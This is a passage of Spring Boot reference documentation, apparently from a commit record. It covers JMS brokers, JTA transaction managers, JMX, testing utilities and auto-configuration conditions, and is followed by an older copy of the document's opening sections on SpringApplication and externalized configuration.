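\nWhen targeting the embedded mode you might instead declare something like the following\nsketch (property names per `HornetQProperties`; the queue and topic names are illustrative):\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=embedded\n\tspring.hornetq.embedded.queues=inboundQueue\n\tspring.hornetq.embedded.topics=events\n----\n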
\nWhen embedding the broker, you can choose whether to enable persistence, and list the\ndestinations that should be made available. These can be specified as a comma-separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee {sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all and destinations are resolved against their names,\neither using the '`name`' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`+spring.activemq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-jms-jndi]]\n==== Using a JNDI ConnectionFactory\nIf you are running your application in an Application Server Spring Boot will attempt to\nlocate a JMS `ConnectionFactory` using JNDI. By default the locations `java:\/JmsXA` and\n`java:\/XAConnectionFactory` will be checked. You can use the\n`spring.jms.jndi-name` property if you need to specify an alternative location:\n\n[source,properties,indent=0]\n----\n\tspring.jms.jndi-name=java:\/MyConnectionFactory\n----\n\n\n\n[[boot-features-using-jms-template]]\n[[boot-features-using-jms-sending]]\n==== Sending a message\nSpring's `JmsTemplate` is auto-configured and you can autowire it directly into your\nown beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-javadoc}\/jms\/core\/JmsMessagingTemplate.{dc-ext}[`JmsMessagingTemplate`]\n(new in Spring 4.1) can be injected in a similar manner.\n\n\n\n[[boot-features-using-jms-receiving]]\n==== Receiving a message\n\nWhen the JMS infrastructure is present, any bean can be annotated with `@JmsListener` to\ncreate a listener endpoint. If no `JmsListenerContainerFactory` has been defined, a default\none is configured automatically.\n\nThe following component creates a listener endpoint on the `someQueue` destination:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@JmsListener(destination = \"someQueue\")\n\t\tpublic void processMessage(String content) { ... }\n\n\t}\n----\n
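\nA producer can then post messages to the same destination through the auto-configured\n`JmsTemplate`; for example:\n\n[source,java,indent=0]\n----\n\t\/\/ sends a TextMessage to the someQueue destination\n\tthis.jmsTemplate.convertAndSend(\"someQueue\", \"Hello World\");\n----\n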
\nCheck {spring-javadoc}\/jms\/annotation\/EnableJms.{dc-ext}[the javadoc of `@EnableJms`]\nfor more details.\n\n[[boot-features-jta]]\n== Distributed Transactions with JTA\nSpring Boot supports distributed JTA transactions across multiple XA resources using\neither an http:\/\/www.atomikos.com\/[Atomikos] or\nhttp:\/\/docs.codehaus.org\/display\/BTM\/Home[Bitronix] embedded transaction manager. JTA\ntransactions are also supported when deploying to a suitable Java EE Application Server.\n\nWhen a JTA environment is detected, Spring's `JtaTransactionManager` will be used to manage\ntransactions. Auto-configured JMS, DataSource and JPA beans will be upgraded to support\nXA transactions. You can use standard Spring idioms such as `@Transactional` to\nparticipate in a distributed transaction.\n\n\n\n=== Using an Atomikos transaction manager\nAtomikos is a popular open source transaction manager which can be embedded into your\nSpring Boot application. You can use the `spring-boot-starter-jta-atomikos` Starter POM to\npull in the appropriate Atomikos libraries. Spring Boot will auto-configure Atomikos and\nensure that appropriate `depends-on` settings are applied to your Spring Beans for correct\nstartup and shutdown ordering.\n\nBy default Atomikos transaction logs will be written to a `transaction-logs` folder in\nyour application home directory (the directory in which your application jar file\nresides). You can customize this directory by setting a `spring.jta.log-dir` property in\nyour `application.properties` file. Properties starting `spring.jta.` can also be used to\ncustomize the Atomikos `UserTransactionServiceImp`. See the\n{dc-spring-boot}\/jta\/atomikos\/AtomikosProperties.{dc-ext}[`AtomikosProperties` javadoc]\nfor complete details.\n\n\n\n=== Using a Bitronix transaction manager\nBitronix is another popular open source JTA transaction manager implementation. You can\nuse the `spring-boot-starter-jta-bitronix` starter POM to add the appropriate Bitronix\ndependencies to your project. As with Atomikos, Spring Boot will automatically configure\nBitronix and post-process your beans to ensure that startup and shutdown ordering is\ncorrect.\n\nBy default Bitronix transaction log files (`part1.btm` and `part2.btm`) will be written to\na `transaction-logs` folder in your application home directory. You can customize this\ndirectory by using the `spring.jta.log-dir` property. Properties starting `spring.jta.`\nare also bound to the `bitronix.tm.Configuration` bean, allowing for complete\ncustomization. See the http:\/\/btm.codehaus.org\/api\/2.0.1\/bitronix\/tm\/Configuration.html[Bitronix\ndocumentation] for details.\n
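\nFor example, to keep the transaction logs under your build output directory during\ndevelopment you might use:\n\n[source,properties,indent=0]\n----\n\tspring.jta.log-dir=target\/transaction-logs\n----\n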
\n\n\n=== Using a Java EE managed transaction manager\nIf you are packaging your Spring Boot application as a `war` or `ear` file and deploying\nit to a Java EE application server, you can use your application server's built-in\ntransaction manager. Spring Boot will attempt to auto-configure a transaction manager by\nlooking at common JNDI locations (`java:comp\/UserTransaction`,\n`java:comp\/TransactionManager` etc.). If you are using a transaction service provided by\nyour application server, you will generally also want to ensure that all resources are\nmanaged by the server and exposed over JNDI. Spring Boot will attempt to auto-configure\nJMS by looking for a `ConnectionFactory` at the JNDI path `java:\/JmsXA` or\n`java:\/XAConnectionFactory` and you can use the\n<<boot-features-connecting-to-a-jndi-datasource, `spring.datasource.jndi-name` property>>\nto configure your `DataSource`.\n\n\n\n=== Mixing XA and non-XA JMS connections\nWhen using JTA, the primary JMS `ConnectionFactory` bean will be XA aware and participate\nin distributed transactions. In some situations you might want to process certain JMS\nmessages using a non-XA `ConnectionFactory`. For example, your JMS processing logic might\ntake longer than the XA timeout.\n\nIf you want to use a non-XA `ConnectionFactory` you can inject the\n`nonXaJmsConnectionFactory` bean rather than the `@Primary` `jmsConnectionFactory` bean.\nFor consistency the `jmsConnectionFactory` bean is also provided using the bean alias\n`xaJmsConnectionFactory`.\n\nFor example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ Inject the primary (XA aware) ConnectionFactory\n\t@Autowired\n\tprivate ConnectionFactory defaultConnectionFactory;\n\n\t\/\/ Inject the XA aware ConnectionFactory (uses the alias and injects the same as above)\n\t@Autowired\n\t@Qualifier(\"xaJmsConnectionFactory\")\n\tprivate ConnectionFactory xaConnectionFactory;\n\n\t\/\/ Inject the non-XA aware ConnectionFactory\n\t@Autowired\n\t@Qualifier(\"nonXaJmsConnectionFactory\")\n\tprivate ConnectionFactory nonXaConnectionFactory;\n----\n\n\n\n=== Supporting an alternative embedded transaction manager\nThe {sc-spring-boot}\/jta\/XAConnectionFactoryWrapper.{sc-ext}[`XAConnectionFactoryWrapper`]\nand {sc-spring-boot}\/jta\/XADataSourceWrapper.{sc-ext}[`XADataSourceWrapper`] interfaces\ncan be used to support alternative embedded transaction managers. The interfaces are\nresponsible for wrapping `XAConnectionFactory` and `XADataSource` beans and exposing them\nas regular `ConnectionFactory` and `DataSource` beans which will transparently enroll in\nthe distributed transaction. DataSource and JMS auto-configuration will use JTA variants\nas long as you have a `JtaTransactionManager` bean and appropriate XA wrapper beans\nregistered within your `ApplicationContext`.\n\nThe {sc-spring-boot}\/jta\/BitronixXAConnectionFactoryWrapper.{sc-ext}[BitronixXAConnectionFactoryWrapper]\nand {sc-spring-boot}\/jta\/BitronixXADataSourceWrapper.{sc-ext}[BitronixXADataSourceWrapper]\nprovide good examples of how to write XA wrappers.\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP, etc. If Spring Integration is available on your classpath it will be initialized\nthrough the `@EnableIntegration` annotation. Message processing statistics will be\npublished over JMX if `'spring-integration-jmx'` is also on the classpath.\nSee the {sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. 
By default Spring Boot will create an `MBeanServer` with bean id\n'`mbeanServer`' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the {sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.\n
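\nAs a quick illustration, a bean like the following (the names are only examples) would be\nregistered as an MBean automatically:\n\n[source,java,indent=0]\n----\n\timport org.springframework.jmx.export.annotation.ManagedAttribute;\n\timport org.springframework.jmx.export.annotation.ManagedOperation;\n\timport org.springframework.jmx.export.annotation.ManagedResource;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\t@ManagedResource\n\tpublic class CounterBean {\n\n\t\tprivate long count;\n\n\t\t@ManagedAttribute\n\t\tpublic long getCount() {\n\t\t\treturn this.count;\n\t\t}\n\n\t\t@ManagedOperation\n\t\tpublic void reset() {\n\t\t\tthis.count = 0;\n\t\t}\n\n\t}\n----\n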
\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module\nunder the `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` '`Starter POM`' (in the `test` `scope`), you will find\nthe following provided libraries:\n\n* Spring Test -- integration test support for Spring applications.\n* JUnit -- The de-facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat` style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond '`unit testing`' and start '`integration testing`' (with\na Spring `ApplicationContext` actually involved in the process). It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency directly to `org.springframework:spring-test` or use the\n`spring-boot-starter-test` '`Starter POM`' to pull it in transitively.\n\nIf you have not used the `spring-test` module before you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext` so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMVC`) by looking for the `@WebAppConfiguration` annotation. (`MockMVC` and\n`@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@IntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time-consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port you can add environment properties to `@IntegrationTest` as colon- or\nequals-separated name-value pairs, e.g. `@IntegrationTest(\"server.port:9000\")`.\nAdditionally you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = MyApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nPlease note that you cannot use the `@SpringApplicationConfiguration` annotation that was\n<<boot-features-testing-spring-boot-applications,described above>> as Spock\nhttps:\/\/code.google.com\/p\/spock\/issues\/detail?id=349[does not find the\n`@ContextConfiguration` meta-annotation]. 
To work around this limitation, you should use\nthe `@ContextConfiguration` annotation directly and configure it to use the Spring\nBoot specific context loader:\n\n[source,groovy,indent=0]\n----\n\t@ContextConfiguration(loader = SpringApplicationContextLoader.class)\n\tclass ExampleSpec extends Specification {\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes that are generally useful when testing your application are\npackaged as part of `spring-boot`.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that you\ncan apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. Simply declare the capture as a `@Rule` then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is\nuseful in integration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response\nlocation), ignoring cookies (so the template is stateless), and not throwing exceptions\non server-side errors. 
It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or better), and if you have that on your classpath the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Developing auto-configuration and using conditions\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked up by\nSpring Boot.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard `@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only\napplies when relevant classes are found and when you have not declared your own\n`@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. For example,\nif you provide web specific configuration, your class may need to be applied after\n`WebMvcAutoConfiguration`.\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Condition` annotations on your\nauto-configuration class. The `@ConditionalOnMissingBean` is one common example that is\nused to allow developers to '`override`' auto-configuration if they are not happy with\nyour defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n
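\nPutting these pieces together, a trivial auto-configuration class might look like the\nfollowing sketch (`LibXClient` stands in for a hypothetical class from the library being\nauto-configured):\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.condition.ConditionalOnClass;\n\timport org.springframework.boot.autoconfigure.condition.ConditionalOnMissingBean;\n\timport org.springframework.context.annotation.Bean;\n\timport org.springframework.context.annotation.Configuration;\n\n\t\/\/ Only applies when LibXClient (a hypothetical library class) is on the classpath\n\t@Configuration\n\t@ConditionalOnClass(LibXClient.class)\n\tpublic class LibXAutoConfiguration {\n\n\t\t\/\/ Backs off if the user has already declared their own LibXClient bean\n\t\t@Bean\n\t\t@ConditionalOnMissingBean\n\t\tpublic LibXClient libXClient() {\n\t\t\treturn new LibXClient();\n\t\t}\n\n\t}\n----\n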
\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allow configuration\nto be skipped based on the presence or absence of specific classes. Because\nannotation meta-data is parsed using http:\/\/asm.ow2.org\/[ASM] you can actually use the\n`value` attribute to refer to the real class, even though that class might not actually\nappear on the running application classpath. You can also use the `name` attribute if you\nprefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow configurations\nto be skipped based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nNOTE: `@Conditional` annotations are processed when `@Configuration` classes are\nparsed. Auto-configure `@Configuration` is always parsed last (after any user defined\nbeans), however, if you are using these annotations on regular `@Configuration` classes,\ncare must be taken not to refer to bean definitions that have not yet been created.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web Application Conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be skipped depending on whether the application is a\n'web application'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be skipped based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. If you have specific questions, take a look at the\n<<howto.adoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n\n","old_contents":"[[boot-features]]\n= Spring Boot features\n\n[partintro]\n--\nThis section dives into the details of Spring Boot. Here you can learn about the key\nfeatures that you will want to use and customize. If you haven't already, you might want\nto read the '<<getting-started.adoc#getting-started>>' and\n'<<using-spring-boot.adoc#using-boot>>' sections so that you have a good grounding\nof the basics.\n--\n\n\n\n[[boot-features-spring-application]]\n== SpringApplication\nThe `SpringApplication` class provides a convenient way to bootstrap a Spring application\nthat will be started from a `main()` method. 
In many situations you can just delegate to\nthe static `SpringApplication.run` method:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MySpringConfiguration.class, args);\n\t}\n----\n\nWhen your application starts you should see something similar to the following:\n\n[indent=0,subs=\"attributes\"]\n----\n . ____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: v{spring-boot-version}\n\n2013-07-31 00:08:16.117 INFO 56603 --- [ main] o.s.b.s.app.SampleApplication : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (\/apps\/myapp.jar started by pwebb)\n2013-07-31 00:08:16.166 INFO 56603 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy\n2014-03-04 13:09:54.912 INFO 41370 --- [ main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080\n2014-03-04 13:09:56.501 INFO 41370 --- [ main] o.s.b.s.app.SampleApplication : Started SampleApplication in 2.992 seconds (JVM running for 3.658)\n----\n\nBy default `INFO` logging messages will be shown, including some relevant startup details\nsuch as the user that launched the application.\n\n\n[[boot-features-banner]]\n=== Customizing the Banner\nThe banner that is printed on start up can be changed by adding a `banner.txt` file\nto your classpath, or by setting `banner.location` to the location of such a file.\nIf the file has an unusual encoding you can set `banner.encoding` (default is UTF-8).\n\n\n[[boot-features-customizing-spring-application]]\n=== Customizing SpringApplication\nIf the `SpringApplication` defaults aren't to your taste you can instead create a local\ninstance and customize it. For example, to turn off the banner you would write:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setShowBanner(false);\n\t\tapp.run(args);\n\t}\n----\n\nNOTE: The constructor arguments passed to `SpringApplication` are configuration sources\nfor spring beans. In most cases these will be references to `@Configuration` classes, but\nthey could also be references to XML configuration or to packages that should be scanned.\n\nIt is also possible to configure the `SpringApplication` using an `application.properties`\nfile. 
See '<<boot-features-external-config>>' for details.\n\nFor a complete list of the configuration options, see the\n{dc-spring-boot}\/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].\n\n\n\n[[boot-features-fluent-builder-api]]\n=== Fluent builder API\nIf you need to build an `ApplicationContext` hierarchy (multiple contexts with a\nparent\/child relationship), or if you just prefer using a '`fluent`' builder API, you\ncan use the `SpringApplicationBuilder`.\n\nThe `SpringApplicationBuilder` allows you to chain together multiple method calls, and\nincludes `parent` and `child` methods that allow you to create a hierarchy.\n\nFor example:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.showBanner(false)\n\t\t.sources(Parent.class)\n\t\t.child(Application.class)\n\t\t.run(args);\n----\n\nNOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.\nWeb components *must* be contained within the child context, and the same `Environment`\nwill be used for both parent and child contexts. See the\n{dc-spring-boot}\/builder\/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder` javadoc]\nfor full details.\n\n\n\n[[boot-features-application-events-and-listeners]]\n=== Application events and listeners\nIn addition to the usual Spring Framework events, such as\n{spring-javadoc}\/context\/event\/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],\na `SpringApplication` sends some additional application events. Some events are actually\ntriggered before the `ApplicationContext` is created.\n\nYou can register event listeners in a number of ways, the most common being the\n`SpringApplication.addListeners(...)` method.\n\nApplication events are sent in the following order, as your application runs:\n\n. An `ApplicationStartedEvent` is sent at the start of a run, but before any\n processing except the registration of listeners and initializers.\n. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in\n the context is known, but before the context is created.\n. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean\n definitions have been loaded.\n. An `ApplicationFailedEvent` is sent if there is an exception on startup.\n\nTIP: You often won't need to use application events, but it can be handy to know that they\nexist. Internally, Spring Boot uses events to handle a variety of tasks.\n\n\n\n[[boot-features-web-environment]]\n=== Web environment\nA `SpringApplication` will attempt to create the right type of `ApplicationContext` on\nyour behalf. By default, an `AnnotationConfigApplicationContext` or\n`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you\nare developing a web application or not.\n\nThe algorithm used to determine a '`web environment`' is fairly simplistic (based on the\npresence of a few classes). You can use `setWebEnvironment(boolean webEnvironment)` if\nyou need to override the default.\n\nIt is also possible to take complete control of the `ApplicationContext` type that will\nbe used by calling `setApplicationContextClass(...)`.\n\nTIP: It is often desirable to call `setWebEnvironment(false)` when using `SpringApplication`\nwithin a JUnit test.\n\n\n\n[[boot-features-command-line-runner]]\n=== Using the CommandLineRunner\nIf you want access to the raw command line arguments, or you need to run some specific code\nonce the `SpringApplication` has started, you can implement the `CommandLineRunner`\ninterface. The `run(String... 
args)` method will be called on all Spring beans\nimplementing this interface.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*;\n\timport org.springframework.stereotype.*;\n\n\t@Component\n\tpublic class MyBean implements CommandLineRunner {\n\n\t\tpublic void run(String... args) {\n\t\t\t\/\/ Do something...\n\t\t}\n\n\t}\n----\n\nYou can additionally implement the `org.springframework.core.Ordered` interface or use the\n`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner`\nbeans are defined that must be called in a specific order.\n\n\n\n[[boot-features-application-exit]]\n=== Application exit\nEach `SpringApplication` will register a shutdown hook with the JVM to ensure that the\n`ApplicationContext` is closed gracefully on exit. All the standard Spring lifecycle\ncallbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can\nbe used.\n\nIn addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`\ninterface if they wish to return a specific exit code when the application ends.\n\n\n\n[[boot-features-external-config]]\n== Externalized Configuration\nSpring Boot allows you to externalize your configuration so you can work with the same\napplication code in different environments. You can use properties files, YAML files,\nenvironment variables and command-line arguments to externalize configuration. Property\nvalues can be injected directly into your beans using the `@Value` annotation, accessed\nvia Spring's `Environment` abstraction or bound to structured objects.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow\nsensible overriding of values. Properties are considered in the following order:\n\n. Command line arguments.\n. Java System properties (`System.getProperties()`).\n. OS environment variables.\n. JNDI attributes from `java:comp\/env`.\n. A `RandomValuePropertySource` that only has properties in `+random.*+`.\n. 